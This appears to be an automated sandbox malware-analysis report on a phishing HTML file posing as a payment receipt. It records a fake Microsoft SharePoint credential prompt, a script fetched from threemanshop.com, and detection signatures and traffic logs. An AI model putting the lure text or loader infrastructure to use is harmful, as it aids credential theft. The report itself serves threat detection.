Edit tour

Windows Analysis Report
Payment Receipt .html

Overview

General Information

Sample name:	Payment Receipt .html
Analysis ID:	1428433
MD5:	b75d9452c7e4b29218ea7b529429df43
SHA1:	4adb8b0f2500013071f5f3fdaf84a39d4df11696
SHA256:	46a6d8e6dde28ff6ef957372da3b0f8a1a8d5126c923ec18508672d29a53f544
Infos:

Detection

HTMLPhisher

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected HtmlPhish10

Detected javascript redirector / loader

HTML Script injector detected

HTML document with suspicious name

HTML file submission containing password form

Phishing site detected (based on image similarity)

Phishing site detected (based on logo match)

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden URLs or javascript code

HTML title does not match URL

IP address seen in connection with other malware

Invalid T&C link found

JA3 SSL client fingerprint seen in connection with other malware

None HTTPS page querying sensitive user data (password, username or email)

Phishing site detected (based on OCR NLP Model)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5608 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Payment Receipt .html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2188,i,16813835599702316226,1852677476728942210,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
0.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Yara detected HtmlPhish10

Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML

Detected javascript redirector / loader

Source: Payment Receipt .html

HTTP Parser: Low number of body elements: 0

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html	HTTP Parser: New script, src: https://cdn.socket.io/4.6.0/socket.io.min.js
Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html	HTTP Parser: New script, src: https://cdn.socket.io/4.6.0/socket.io.min.js

Phishing site detected (based on image similarity)

Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html

Matcher: Found strong image similarity, brand: MICROSOFT

Phishing site detected (based on logo match)

Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html

Matcher: Template: microsoft matched

Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html

HTTP Parser: Number of links: 1

Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: Payment Receipt .html

HTTP Parser: Base64 decoded: https://threemanshop.com

Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html

HTTP Parser: Title: Authenticating ... does not match URL

Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html	HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html	HTTP Parser: Invalid link: Privacy & cookies
Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html	HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html	HTTP Parser: Invalid link: Privacy & cookies

Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html

HTTP Parser: Has password / email / username input fields

Source: Chrome DOM: 0.0	ML Model on OCR Text: Matched 96.2% probability on "Sharepoint Verify Your Identity You've received a secure link to: Shared file. To receive and download this PDF file, please enter specific professional email boo*****@tuxedogov.org credentials that this document was sent to. VeriMng_ 2024 Microsoft Share Point Privacy & Cookies Terms of use Privacy & cookies "
Source: Chrome DOM: 0.1	ML Model on OCR Text: Matched 96.9% probability on "Sharepoint Microsoft Verify Your Identity You've received a secure link to: Shared file. To receive and download this PDF file, please specific professional email enter boo*****@tuxedogov.org credentials that this document was sent to. 2024 Microsoft Share Point Privacy & Cookies Terms of use Privy & cookies "

Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html

HTTP Parser: <input type="password" .../> found

Source: Payment Receipt .html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html	HTTP Parser: No favicon

Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html	HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 23.220.189.216:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.220.189.216:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49777 version: TLS 1.2

Source: Joe Sandbox View	IP Address: 108.156.152.88 108.156.152.88
Source: Joe Sandbox View	IP Address: 13.107.246.41 13.107.246.41
Source: Joe Sandbox View	IP Address: 13.107.246.41 13.107.246.41
Source: Joe Sandbox View	IP Address: 152.199.4.44 152.199.4.44
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 192.229.173.207 192.229.173.207

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157

Source: global traffic	HTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: nullsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jssp.js HTTP/1.1Host: threemanshop.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /w3css/4/w3.css HTTP/1.1Host: www.w3schools.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /image.3812524360.1168/raf,360x360,075,t,fafafa:ca443f4786.jpg HTTP/1.1Host: ih1.redbubble.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /image.3812524360.1168/raf,360x360,075,t,fafafa:ca443f4786.jpg HTTP/1.1Host: ih1.redbubble.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=A+RmcGYuYzDHtHH&MD=8+PF+Do3 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=A+RmcGYuYzDHtHH&MD=8+PF+Do3 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: unknown

DNS traffic detected: queries for: cdn.socket.io

Source: chromecache_63.2.dr, chromecache_72.2.dr	String found in binary or memory: http://www.redbubble.com/people/developerfrida
Source: Payment Receipt .html	String found in binary or memory: https://cdn.socket.io/4.6.0/socket.io.min.js

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 23.220.189.216:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.220.189.216:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49777 version: TLS 1.2

System Summary

HTML document with suspicious name

Source: Name includes: Payment Receipt .html

Initial sample: receipt

Source: classification engine

Classification label: mal72.phis.winHTML@24/30@16/11

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Payment Receipt .html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2188,i,16813835599702316226,1852677476728942210,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2188,i,16813835599702316226,1852677476728942210,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Stealing of Sensitive Information

HTML file submission containing password form

Source: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html

HTTP Parser: file:///C:/Users/user/Desktop/Payment%20Receipt%20.html

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
part-0013.t-0009.t-msedge.net	13.107.246.41	true	false	unknown
cs203.wac.edgecastcdn.net	72.21.91.237	true	false	high
cs1100.wpc.omegacdn.net	152.199.4.44	true	false	unknown
d2vgu95hoyrpkh.cloudfront.net	108.156.152.88	true	false	high
cs837.wac.edgecastcdn.net	192.229.173.207	true	false	high
threemanshop.com	172.67.202.97	true	false	unknown
www.google.com	64.233.177.106	true	false	high
ih1.redbubble.net	unknown	unknown	false	high
aadcdn.msftauth.net	unknown	unknown	false	unknown
www.w3schools.com	unknown	unknown	false	high
cdn.socket.io	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
file:///C:/Users/user/Desktop/Payment%20Receipt%20.html	true	low
https://cdn.socket.io/4.6.0/socket.io.min.js	false	high
https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg	false	unknown
